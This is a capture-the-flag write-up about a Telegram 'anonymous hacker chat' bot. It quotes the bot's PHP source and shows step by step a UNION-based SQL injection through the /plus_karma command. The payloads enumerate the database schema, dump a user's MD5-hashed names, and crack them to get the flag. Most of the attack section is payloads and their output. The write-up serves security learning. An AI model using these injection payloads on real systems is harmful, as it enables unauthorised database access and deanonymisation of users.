In this scenario, we must discover first_name and second_name of an anonymous h4x0r chat which uses a Telegram bot to manage the interface the users can interact with.

Target bot is referred with @anon_hackers_bot and, just after the main setup, it shows us the available commands list and a welcome message:

Hello, d19e1113955c798a4b321c6bddbd025b d41d8cd98f00b204e9800998ecf8427e.
Show/update chat: /chat
Send message: /send hello
Plus/minus karma: /plus_karma id, /minus_karma id
Top 15 users: /top
THis bot need for anonymous communication.
Our advantages:
+ Chat ONLY for elite hackers
+ NO FBI, NO ADMINS, NO FSB, NO ADS
+ Messages self-destruct in 5 minutes
+ You can edit karma members in chat
More info type about

Looking at this description we can deduce that:

  • this chat manages a list of temporary messages users can interact with using direct communications to the bot
  • there is a reputation management system that uses the karma value as unity
  • there are two strange hashes preceded by a “Hello, “ message that could make us think d19e1113955c798a4b321c6bddbd025b and d41d8cd98f00b204e9800998ecf8427e are informations derived by our profile

Neverthless, the situation is still unclear and we need more informations about the environment we must exploit. So, just try to use the /about (very usefull) command and see what spits it out:

THis bot need for anonymous communication. http://wallscollection.net/wp-content/uploads/2016/12/Anonymous-Wallpaper-Hd-For-Desktop-.jpg
Our advantages:
+ Chat ONLY for elite hackers
+ NO FBI, NO ADMINS, NO FSB, NO ADS
+ Super encrypt (MD5) your name and surname
+ Messages self-destruct in 5 minutes
+ You can edit karma members in chat
+ Open Source! https://gist.github.com/dragon996/d6a4d77e175cfe26853a94057096915e (https://gist.github.com/testpnz/aaaab66f09c6f9efb54f05b642d92597)

Great! We have the bot source code! Just have a look: gist

After a little bit of source analysis seems clear that this bot leans on a SQL database and there is just a “little” problem with the input validation in the function that interact with karma points. This probably leads to a SQL Injection vulnerability.
The vulnerable piece of code we’ll exploit is:

<?php
else if (mb_substr($text, 0, 11) == '/plus_karma')
 {
 $search_time = $mysqli->query("SELECT last_time2 FROM `users` WHERE `telegram_id`=".$chat_id." LIMIT 1");
 $row = $search_time->fetch_row();
 $time_now = time();
 if ($row[0]+(60*5)>time())
 {
 $message = 'Попробуйте сделать +1 к карме через 5 минут!';
 sendMessage($chat_id, $message);
 die();
 }
 
 $resultStr = str_replace("/plus_karma ", "", $text);
 
 $stmt = $mysqli->prepare("UPDATE `users` SET karma=karma+1 WHERE `id`=?");
 $stmt->bind_param("i", $resultStr);
 $stmt->execute();
 $stmt->close();
 
 $search_karma = $mysqli->query("SELECT karma FROM `users` WHERE `id`=".$resultStr." LIMIT 1");
 $row = $search_karma->fetch_row();
 
 $mysqli->query("UPDATE `users` SET last_time2=".$time_now." WHERE `telegram_id`=".$chat_id."");
 
 $message = 'Вы успешно добавили +1 к карме id'.$resultStr.'
Его карма: '.$row[0].'';
 sendMessage($chat_id, $message);
 }
 ?>

So, a string like /plus_karma 13 {SQL command} #-- - should be correctly executed. We only have one limitation: a second karma request cannot be done in a range of 2 minutes from the first one.
To ensure this vulnerability can be exploited, just try to send some simple commands and analyze the resulting output:

/plus_karma 13 union select version() LIMIT 1,1 #-- -

You have successfully added +1 to karma id13 union select version() LIMIT 1,1 #-- -
His karma: 10.0.31-MariaDB-0ubuntu0.16.04.2s

So the output is reflected corectly and we can go on just dump the database schema to have the possibility to directly query the information we’re looking for. These are the steps taken:

/plus_karma -13 union select database() #-- -
You have successfully added +1 to karma id-13 union select database() #-- -
His karma: tg_bot

/plus_karma -13 union select count(table_name) from information_schema.TABLES #-- -
You have successfully added +1 to karma id-13 union select count(table_name) from information_schema.TABLES #-- -
His karma: 72

/plus_karma -13 union select table_name from information_schema.TABLES LIMIT 71,1 #-- -
You have successfully added +1 to karma id-13 union select table_name from information_schema.TABLES LIMIT 71,1 #-- -
His karma: users

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
His karma: id

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 2,1;#-- -
His karma: first_name

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 3,1;#-- -
His karma: last_name

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 4,1;#-- -
His karma: state

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 5,1;#-- -
His karma: karma

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 6,1;#-- -
His karma: last_time

/plus_karma -13 UNION SELECT column_name FROM information_schema.columns WHERE `table_schema`=DATABASE() AND `table_name`='users';#-- -
You have successfully added +1 to karma id-13 UNION SELECT column_nameFROM information_schema.columns  WHERE `table_schema`=DATABASE() AND `table_name`='users' LIMIT 7,1;#-- -
His karma: last_time2

At this point, we know the database schema portion we are interested in and it’s time to look for the user having id=13.

/plus_karma -13 UNION SELECT concat(first_name,'||',last_name) FROM tg_bot.users WHERE `id`=13;#-- -
You have successfully added +1 to karma id-13 UNION SELECT concat(first_name,'||',last_name) FROM tg_bot.users WHERE `id`=13;#-- -
His karma: 61409aa1fd47d4a5332de23cbf59a36f||3dba15fad60b23675fe9b01b716413f

Taking a look at the source code, it’s possible to figure out what the resulting output strings are: $first_name = md5($response['message']['chat']['first_name']);$last_name = md5($response['message']['chat']['last_name']);, so we need to guess the clear values.
Using hashkiller, we can revert them and observe that: $first_name = 'John' and $last_name = 'Cottrell'. Final flag is: John Cottrell.